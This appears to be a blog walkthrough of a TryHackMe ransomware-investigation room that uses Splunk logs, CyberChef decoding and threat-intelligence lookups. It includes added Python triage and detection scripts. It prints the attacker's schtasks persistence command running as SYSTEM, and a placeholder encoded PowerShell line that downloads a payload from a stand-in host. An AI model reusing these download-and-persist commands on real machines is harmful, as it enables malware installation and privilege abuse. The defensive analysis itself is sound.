In this post, we will walk through the PS Eclipse room on TryHackMe. This room covers investigating ransomware activity on a compromised machine.
For anyone who may not be familiar with the term, ransomware is a type of malware (malicious software) that, once activated, encrypts files and keeps them inaccessible until a ransom is paid. It is now widely used by threat actors and criminal groups to demand a ransom from their victims in exchange for a decryption key. The computer itself may become locked, or the data on it may be encrypted, stolen or deleted, rendering it unavailable to legitimate users. Attackers can also threaten to leak the data they stole and demand a second ransom; this is called a double extortion ransomware attack.
The tools used for this investigation are Splunk, VirusTotal, Hybrid Analysis and CyberChef.
Let us begin!
Challenge Scenario:
You are a SOC Analyst for an MSSP (Managed Security Service Provider) company called TryNotHackMe.
A customer sent an email asking for an analyst to investigate the events that occurred on Keegan’s machine on Monday, May 16th, 2022. The client noted that the machine is operational, but some files have a weird file extension. The client is worried that there was a ransomware attempt on Keegan’s device.
Your manager has tasked you with checking the events in Splunk to determine what occurred on Keegan’s device.
Happy Hunting!
Challenge Questions
Q. A suspicious binary was downloaded to the endpoint. What was the name of the binary?
We will head to Splunk, select All time and insert * in the search query to retrieve all the data that has been ingested into Splunk.
We have over 17k events available to us.
We also have 8 different source types for our investigation.
So, the first thing we’re looking for is a download of a suspicious binary. This can either be the ransomware itself or the executable that may later on retrieve the ransomware from a C2 server.
We will first select some extra fields we think will assist us with our investigation (you can skip this part).
We included fields like Source & Destination IP, Destination Port, File Path, etc.
Let’s proceed by checking the DestinationPort field. We can see that communication took place mostly on ports 443 and 80, so the binary was downloaded via one of these ports. Let’s investigate further.
When we check port 443, we see just three executables associated with it: MS Defender, OneDrive and an executable in the Temp folder (we will take note of this).
When we check port 80, we see just one, PowerShell, which is interesting.
Let’s filter on PowerShell in the search; maybe that can help us find suspicious commands and figure out why PowerShell was used on port 80.
Now we will select the CommandLine field on the left and see what we find.
It looks like an encoded command, which is super suspicious.
So let’s run it through CyberChef, an online encoder/decoder tool, and see what it can make of it.
First we decode the text using the From Base64 operation.
The result looks as if someone inserted symbols between every letter. This is because PowerShell’s encoded commands are Base64 of UTF-16LE text, so every ASCII character is followed by a null byte. We decode the text again using the Decode text operation (UTF-16LE), and the output is now readable.
We have decoded the command and found the name of the binary that was downloaded; it was stored in the Temp directory.
Ans: OUTSTANDING_GUTTER.exe
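As an added example, not code from the original walkthrough or the TryHackMe room, the following Python script does what the two CyberChef steps above do, on a constructed command line: it pulls the Base64 payload from a PowerShell -EncodedCommand switch, decodes it as UTF-16LE, and checks the clear text for the behaviours seen in this room (a download, a drop into Temp, schtasks persistence and /RU SYSTEM). The placeholder script, the placeholder host and the indicator patterns are my own assumptions, not the room’s data.

```python
import base64
import re
from typing import Dict, List, Optional

# Constructed placeholder script (NOT the payload from the room): the kinds of
# actions the decoded command in the walkthrough contained, with a placeholder host.
PLACEHOLDER_SCRIPT = (
    "Invoke-WebRequest -Uri http://EXAMPLE-PLACEHOLDER.invalid/payload.exe "
    "-OutFile C:\\Windows\\Temp\\payload.exe; "
    "schtasks.exe /Create /TN payload.exe /TR C:\\Windows\\Temp\\payload.exe "
    "/SC ONEVENT /EC Application /MO *[System/EventID=777] /RU SYSTEM /f"
)


def encode_powershell_command(script: str) -> str:
    """Produce what powershell.exe -EncodedCommand expects: Base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed CommandLine field, shaped like the process-creation event seen in Splunk.
SAMPLE_COMMANDLINE = (
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
    + encode_powershell_command(PLACEHOLDER_SCRIPT)
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match "-e<letters>" and check that it is a prefix of the full switch name.
_SWITCH = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)")

# Indicators a defender would look for in the decoded text (assumed patterns).
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    "download": re.compile(r"(?i)invoke-webrequest|downloadfile|downloadstring|\biwr\b|start-bitstransfer"),
    "temp_drop": re.compile(r"(?i)\\windows\\temp\\|\\appdata\\local\\temp\\|%temp%"),
    "persistence": re.compile(r"(?i)schtasks(?:\.exe)?\s+/create"),
    "elevation": re.compile(r"(?i)/ru\s+system"),
}


def extract_encoded_command(command_line: str) -> Optional[str]:
    """Return the Base64 payload of an -EncodedCommand switch, or None if there is none."""
    for match in _SWITCH.finditer(command_line):
        switch, payload = match.group(1).lower(), match.group(2)
        # "-e", "-enc", "-EncodedCommand" qualify; "-ExecutionPolicy" does not.
        if "encodedcommand".startswith(switch):
            return payload
    return None


def decode_encoded_command(payload: str) -> str:
    """Base64-decode, then decode UTF-16LE: the NUL after every ASCII character is
    what CyberChef shows between the first and second operation."""
    raw = base64.b64decode(payload, validate=True)
    return raw.decode("utf-16-le")


def triage_commandline(command_line: str) -> Dict[str, object]:
    """Decode an encoded PowerShell command line and list the indicators found in it."""
    payload = extract_encoded_command(command_line)
    if payload is None:
        return {"encoded": False, "decoded": None, "indicators": []}
    decoded = decode_encoded_command(payload)
    hits: List[str] = [name for name, pattern in INDICATORS.items() if pattern.search(decoded)]
    return {"encoded": True, "decoded": decoded, "indicators": hits}


if __name__ == "__main__":
    result = triage_commandline(SAMPLE_COMMANDLINE)
    print(result["decoded"])
    print("indicators:", result["indicators"])
```

Running the script prints the clear-text command and the four indicator names; a command line with no encoded payload (for example one using -File) comes back with encoded set to False, so the same function can be run over every PowerShell CommandLine value exported from Splunk.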
Q. What is the address the binary was downloaded from? Add http:// to your answer & defang the URL.
In the previous image, we can see where the suspicious binary was downloaded from. We defang the URL for safety reasons, so that nobody accidentally clicks on it.
Ans: hxxp[://]886e-181-215-214-32[.]ngrok[.]io
Q. What Windows executable was used to download the suspicious binary? Enter full path.
Windows PowerShell was used to retrieve the binary. To find the full path, go back to Splunk and check the Image field.
Ans: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Q. What command was executed to configure the suspicious binary to run with elevated privileges?
The question asks for the command that was executed to allow the binary to run with elevated privileges. We run the search for PowerShell once more and look at the CommandLine field to see the commands PowerShell executed.
The first value is our answer. This command registers the malicious executable as a scheduled task that runs when a certain condition is met:
- schtasks.exe: Enables administrators to create, delete, query, change, run, and end scheduled tasks on a local or remote computer.
- /TN and /TR: The task name and the program the task runs, here the executable in C:\Windows\Temp.
- /SC ONEVENT: Runs the task when a matching event is logged rather than on a time schedule.
- /EC Application: The event channel (log) to watch for that event, here the Application log.
- /MO: Specifies the trigger condition for the task; with ONEVENT this is an event query, in this case matching Event ID 777.
- /RU: Specifies the user account under which the task will run, in this case the SYSTEM account.
- /f: Forces the task to be created without prompting for confirmation.
We could have taken the answer from the decoded text, but it does not contain the full path of schtasks as shown in the CommandLine field.
Ans: "C:\Windows\system32\schtasks.exe" /Create /TN OUTSTANDING_GUTTER.exe /TR C:\Windows\Temp\COUTSTANDING_GUTTER.exe /SC ONEVENT /EC Application /MO *[System/EventID=777] /RU SYSTEM /f
Q. What permissions will the suspicious binary run as? What was the command to run the binary with elevated privileges? (Format: User + ; + CommandLine)
The question tells us the format in which they want the answer: User + ; + CommandLine.
Let’s take a look at the CommandLine field again and see what we can find.
Now I will look at the second event in the dropdown menu of CommandLine.
Remember that in the command from #4 the task would run as the user SYSTEM.
Upon research, you will find that the proper format for the privileged system account is NT AUTHORITY\SYSTEM.
This is the first part of our answer. Now we add the ; and the CommandLine value chosen in the image above (the second command), and that is our answer.
Ans: NT AUTHORITY\SYSTEM;"C:\Windows\system32\schtasks.exe" /Run /TN OUTSTANDING_GUTTER.exe
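As an added example covering both the /Create command from #4 and the /Run command from #5 (my own code, not the room’s), the Python below parses schtasks command lines into their switches, flags the properties that made this task dangerous, and groups creates and runs by task name so a task that is registered and then fired on demand stands out. The two sample commands are the answers above; the NightlyBackup task is a constructed benign entry, and the switch-parsing rule (a switch followed by a non-switch token takes it as a value) is an assumption of mine.

```python
import re
from typing import Dict, List, Optional

# Sample command lines: the two schtasks commands from the answers above plus a
# constructed benign task, in the order they would appear in the CommandLine field.
SAMPLE_COMMANDLINES = [
    r'"C:\Windows\system32\schtasks.exe" /Create /TN OUTSTANDING_GUTTER.exe '
    r'/TR C:\Windows\Temp\COUTSTANDING_GUTTER.exe /SC ONEVENT /EC Application '
    r'/MO *[System/EventID=777] /RU SYSTEM /f',
    r'"C:\Windows\system32\schtasks.exe" /Run /TN OUTSTANDING_GUTTER.exe',
    # constructed, benign
    r'schtasks.exe /Create /TN NightlyBackup /TR C:\Tools\backup.exe /SC DAILY /ST 02:00',
]

_TOKEN = re.compile(r'"[^"]*"|\S+')
_ACTIONS = ("/create", "/run", "/delete", "/query", "/change", "/end")
# Locations an unprivileged user (or a process running as one) can write to.
_TEMP_PATHS = re.compile(r"(?i)\\(?:windows\\temp|users\\[^\\]+\\appdata\\local\\temp|users\\public)\\")


def parse_schtasks(command_line: str) -> Optional[Dict[str, object]]:
    """Split a schtasks.exe command line into its switches. A switch followed by a
    token that does not start with '/' takes that token as its value; otherwise it
    is a bare flag such as /f. Returns None for non-schtasks command lines."""
    tokens = [t.strip('"') for t in _TOKEN.findall(command_line)]
    if not tokens or not tokens[0].lower().endswith(("schtasks", "schtasks.exe")):
        return None
    switches: Dict[str, object] = {}
    i = 1
    while i < len(tokens):
        if tokens[i].startswith("/"):
            key = tokens[i].lower()
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                switches[key] = tokens[i + 1]
                i += 1
            else:
                switches[key] = True
        i += 1
    action = next((a[1:] for a in _ACTIONS if a in switches), "unknown")
    return {
        "image": tokens[0],
        "action": action,
        "task_name": switches.get("/tn"),
        "task_run": switches.get("/tr"),
        "schedule": switches.get("/sc"),
        "event_channel": switches.get("/ec"),
        "modifier": switches.get("/mo"),
        "run_as": switches.get("/ru"),
        "force": switches.get("/f") is True,
    }


def assess_task(task: Dict[str, object]) -> List[str]:
    """Flag the properties that made the task in this walkthrough dangerous."""
    findings: List[str] = []
    if task["action"] != "create":
        return findings
    if str(task["run_as"] or "").upper() in {"SYSTEM", r"NT AUTHORITY\SYSTEM"}:
        findings.append("runs_as_system")
    if task["task_run"] and _TEMP_PATHS.search(str(task["task_run"])):
        findings.append("binary_in_temp")
    if str(task["schedule"] or "").upper() == "ONEVENT":
        findings.append("event_triggered")
    if task["force"]:
        findings.append("forced_create")
    return findings


def correlate(command_lines: List[str]) -> Dict[str, Dict[str, object]]:
    """Group schtasks activity by task name so that a /Create followed by an
    on-demand /Run, as seen in this room, stands out."""
    timeline: Dict[str, Dict[str, object]] = {}
    for command_line in command_lines:
        task = parse_schtasks(command_line)
        if task is None or not task["task_name"]:
            continue
        entry = timeline.setdefault(str(task["task_name"]), {"created": None, "runs": 0, "findings": []})
        if task["action"] == "create":
            entry["created"] = task
            entry["findings"] = assess_task(task)
        elif task["action"] == "run":
            entry["runs"] = int(entry["runs"]) + 1
    return timeline


if __name__ == "__main__":
    for name, entry in correlate(SAMPLE_COMMANDLINES).items():
        print(name, "runs:", entry["runs"], "findings:", entry["findings"])
```

Feeding the CommandLine values exported from Splunk into correlate() gives one entry per task name; the OUTSTANDING_GUTTER.exe entry carries all four findings and one run, while the benign task carries none, which is the separation a detection rule for this technique needs.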
Q. The suspicious binary connected to a remote server. What address did it connect to? Add http:// to your answer & defang the URL.
So it looks like the downloaded binary reached out to a remote server after the user executed it. Let’s go through the logs and figure out what the server was.
Since we know the binary’s name, we put it in the search bar.
Upon investigation, I found a URL similar to the one we had to defang in #2, under the QueryName field (this field shows the domain names queried). Add http:// and defang the URL, and that is your answer.
Ans: hxxp[://]9030-181-215-214-32[.]ngrok[.]io
Q. A PowerShell script was downloaded to the same location as the suspicious binary. What was the name of the file?
A file was retrieved from the domain we identified in the previous question, and it appears to be a PowerShell script. To find the file, we search using the PowerShell script extension, .ps1.
We will list the files we find in a table using the following search query:
* .ps1
| table TargetFilename
where:
- table: Takes a result set and places the specified fields into a tabular view
- TargetFilename: Name of the file that was created/downloaded
The one file that looks very suspicious is script.ps1.
We can’t say for certain that this was the retrieved file just yet, so we will check it against a couple of threat intelligence tools. We will take the file’s hash and submit it to both VirusTotal and Hybrid Analysis, services that run a file through multiple antivirus/anti-malware engines.
We copy the SHA256 hash of the file and submit it.
From our findings, multiple antivirus engines flagged the file as malicious and identified it as ransomware, so script.ps1 is definitely the answer.
Ans: script.ps1
Q. The malicious script was flagged as malicious. What do you think was the actual name of the malicious script?
We go back to the online tools we used to identify the script’s actual name. Upon investigation, we discover that the actual name of the script is BlackSun.ps1.
Ans: BlackSun.ps1
Q. A ransomware note was saved to disk, which can serve as an IOC. What is the full path to which the ransom note was saved?
So we know the script is the ransomware. A ransom note typically comes with the malware and is saved as a text file. We can answer this by searching for BlackSun (since we know the actual name of the ransomware) or by searching for text files using the .txt extension. Here, we will use the latter.
We then look for the files under TargetFilename.
Ans: C:\Users\keegan\Downloads\vasg6b0wmw029hd\BlackSun_README.txt
Q. The script saved an image file to disk to replace the user’s desktop wallpaper, which can also serve as an IOC. What is the full path of the image?
Similar to the previous question, we can answer this by searching for BlackSun or by searching for image files using multiple file extensions, e.g., JPEG/PNG.
We can see the image file created by the ransomware.
Ans: C:\Users\Public\Pictures\blacksun.jpg
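As an added example covering the three file-artifact hunts in this walkthrough (the .ps1 table, the ransom note and the wallpaper image), here is a Python version of those searches, written as detection rules, over constructed Sysmon FileCreate (Event ID 11) records shaped like the Splunk events. This is my code, not the room’s: the records, the field names, the script-host list and the note-name regex are assumptions, although the malicious paths follow the answers above.

```python
import re
from typing import Dict, List

# Constructed FileCreate (Sysmon Event ID 11) records in the shape Splunk shows them.
# Malicious paths follow the walkthrough's answers; the benign entries are made up.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"EventCode": 11, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Windows\Temp\OUTSTANDING_GUTTER.exe"},
    {"EventCode": 11, "Image": r"C:\Windows\Temp\OUTSTANDING_GUTTER.exe",
     "TargetFilename": r"C:\Windows\Temp\script.ps1"},
    {"EventCode": 11, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\keegan\Downloads\vasg6b0wmw029hd\BlackSun_README.txt"},
    {"EventCode": 11, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetFilename": r"C:\Users\Public\Pictures\blacksun.jpg"},
    {"EventCode": 11, "Image": r"C:\Windows\System32\notepad.exe",
     "TargetFilename": r"C:\Users\keegan\Documents\notes.txt"},
    {"EventCode": 11, "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetFilename": r"C:\Program Files\SomeApp\update.ps1"},
    {"EventCode": 11, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\keegan\Pictures\holiday.png"},
]

_TEMP_DIR = re.compile(r"(?i)\\(?:windows\\temp|users\\[^\\]+\\appdata\\local\\temp)\\")
_SCRIPT_HOST = re.compile(r"(?i)\\(?:powershell|pwsh|wscript|cscript|mshta)\.exe$")
# Typical ransom-note file names (assumed list).
_NOTE_NAME = re.compile(r"(?i)(?:readme|decrypt|recover|restore|how[_-]?to|ransom).*\.txt$")
_IMAGE_EXT = (".jpg", ".jpeg", ".png", ".bmp")


def table_target_filename(events: List[Dict[str, object]], extension: str) -> List[str]:
    """Equivalent of the Splunk search  * <extension> | table TargetFilename  over FileCreate events."""
    ext = extension.lower()
    return [str(e["TargetFilename"]) for e in events
            if e["EventCode"] == 11 and str(e["TargetFilename"]).lower().endswith(ext)]


def files_written_by(events: List[Dict[str, object]], image_name: str) -> List[str]:
    """Pivot on a process name, as the walkthrough does by searching for the binary."""
    wanted = image_name.lower()
    return [str(e["TargetFilename"]) for e in events
            if e["EventCode"] == 11 and str(e["Image"]).lower().rsplit("\\", 1)[-1] == wanted]


def find_ransomware_artifacts(events: List[Dict[str, object]]) -> Dict[str, List[str]]:
    """Apply the three artifact hunts from the walkthrough as detection rules."""
    found: Dict[str, List[str]] = {"dropped_scripts": [], "ransom_notes": [], "wallpaper_candidates": []}
    for e in events:
        if e["EventCode"] != 11:
            continue
        path, image = str(e["TargetFilename"]), str(e["Image"])
        low = path.lower()
        name = low.rsplit("\\", 1)[-1]
        # A .ps1 dropped into a temp directory: a script staged by a downloader.
        if name.endswith(".ps1") and _TEMP_DIR.search(low):
            found["dropped_scripts"].append(path)
        # A text file with a ransom-note style name written by a script host, not an editor.
        if _NOTE_NAME.search(name) and _SCRIPT_HOST.search(image):
            found["ransom_notes"].append(path)
        # An image written by a script host or into the shared Public\Pictures folder.
        if name.endswith(_IMAGE_EXT) and (_SCRIPT_HOST.search(image) or "\\users\\public\\pictures\\" in low):
            found["wallpaper_candidates"].append(path)
    return found


if __name__ == "__main__":
    print(table_target_filename(SAMPLE_EVENTS, ".ps1"))
    print(files_written_by(SAMPLE_EVENTS, "OUTSTANDING_GUTTER.exe"))
    print(find_ransomware_artifacts(SAMPLE_EVENTS))
```

The table function reproduces the manual Splunk step (it returns both .ps1 files, as the room’s table did); find_ransomware_artifacts adds the context the walkthrough used implicitly, such as which process wrote the file, so only the ransomware’s note and wallpaper are returned while the user’s own notes.txt and holiday.png are not.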
Summary
From our investigation, we can understand how the incident occurred. The threat actor initially compromised Keegan’s system, likely via a phishing email attachment or malicious link, and gained unauthorized access by exploiting an unpatched vulnerability. They then executed a PowerShell command to download a malicious executable and scheduled it to run with elevated privileges, which retrieved the BlackSun ransomware from a malicious URL. The downloaded malware went on to encrypt some files on the system and change their file extensions, rendering them unavailable. The threat actor also left a ransom note, likely stating that some files are encrypted and cannot be opened without paying a ransom for the decryption key; the note will also describe the method of payment.
To learn more about BlackSun ransomware, you can check this page.
Tips
Let us look at some measures that can be implemented to mitigate the risk of ransomware infection:
- Download software applications only from official stores and trusted pages
- Regularly update installed applications and deploy patches to fix system flaws/bugs
- Do not download attachments, especially executable attachments, from suspicious or unsolicited emails, and avoid clicking on links in irrelevant emails received from unknown, suspicious addresses.
- Install and run advanced endpoint detection and response (EDR) solutions to enable timely identification and remediation of systems in the event of a breach.
- Maintain regular backups of important files.
If you discover that your machine is infected with malware, disconnect the compromised machine from the network and scan your computer with legitimate antivirus software to eliminate possible malware infections.
Conclusion
The use of ransomware to extort money has been on the rise and several well-known organizations in various industries have already been compromised. It is crucial that proper measures be put in place to defend against such attacks.